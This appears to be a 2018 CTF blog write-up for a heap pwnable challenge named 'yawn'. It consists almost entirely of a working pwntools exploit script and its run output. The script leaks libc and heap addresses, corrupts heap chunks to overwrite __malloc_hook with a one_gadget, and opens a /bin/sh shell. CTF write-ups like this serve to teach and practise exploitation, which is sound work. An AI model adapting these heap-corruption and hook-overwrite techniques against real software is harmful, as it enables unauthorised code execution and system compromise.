Category : pwnable
Summary : heap
Exploit
#!/usr/bin/python
from pwn import *
def cmd_add(name, desc):
ru('>> ')
sl('1')
ru('Enter name: ')
sl(name)
ru('Enter desc: ')
if desc:
sl(desc)
def cmd_edit(idx, name, size, desc):
ru('>> ')
sl('2')
ru('Enter index: ')
sl(str(idx))
ru('Enter name: ')
ss(name)
ru('Enter size: ')
sl(str(size))
ru('Enter desc: ')
ss(desc)
def cmd_remove(idx):
ru('>> ')
sl('3')
ru('Enter idx: ')
sl(str(idx))
def cmd_view(idx):
ru('>> ')
sl('4')
ru('Enter idx: ')
sl(str(idx))
note = {}
ru('Note ID : ')
note['idx'] = int(rl(False))
ru('Name : ')
note['name'] = rl(False)
ru('Size : ')
note['size'] = int(rl(False))
ru('Description : ')
note['desc'] = rl(False)
return note
s = process('./yawn')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send
free_got = 0x601F68
note_table = 0x602040
# for libc leak
cmd_add('a' * 0x50+p64(0xffffffffffffffff)+p64(free_got), '')
libc_base = u64(cmd_view(0)['desc'].ljust(8, '\x00')) - 0x844f0
print hex(libc_base)
libc_malloc_hook = libc_base + 0x3c4b10
libc_one_gadget = libc_base + 0xf1147
'''
0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
# for heap leak
cmd_add('b' * 0x50+p64(0xffffffffffffffff)+p64(note_table), '')
heap_base = u64(cmd_view(1)['desc'].ljust(8, '\x00')) - 0x1040
print hex(heap_base)
cmd_add('c' * 0x30, 'C' * 0x59) # 2 : 0x70 0x70
cmd_add('d' * 0x50 + p64(0xffffffffffffffff)+p64(heap_base + 0x1010+ (0x20+0x70)*2+0x10), '') # 3 : 0x20 0x70
# pointing note2 -> description
cmd_remove(2)
cmd_remove(3)
cmd_add('NO', '_' * 9)
cmd_add(p64(libc_malloc_hook - 0x23), '_' * 9)
cmd_add('NO', '_' * 9)
cmd_add('NO', '_' * 9)
# reallocate libc_malloc_hook
cmd_add('e' * (0x23-0x10) + p64(libc_one_gadget), '_' * 9)
# trigger
cmd_add('give me the shell', 'paul')
s.interactive()
s.close()
$ python ex.py
[+] Starting local process './yawn': pid 2050
0x7fb84bb3e000
0x178a000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)
'CTF > 2018' 카테고리의 다른 글
| SECCON CTF 2018 QUAL - secret_message (one shot exploit) (0) | 2018.11.25 |
|---|---|
| INCTF 2018 - lost (0) | 2018.11.04 |
| SECCON 2018 QUAL - Simple memo (0) | 2018.11.02 |
| HITCON CTF 2018 - groot (0) | 2018.10.30 |
| Tokyo Western CTF 2018 - BBQ (0) | 2018.09.10 |
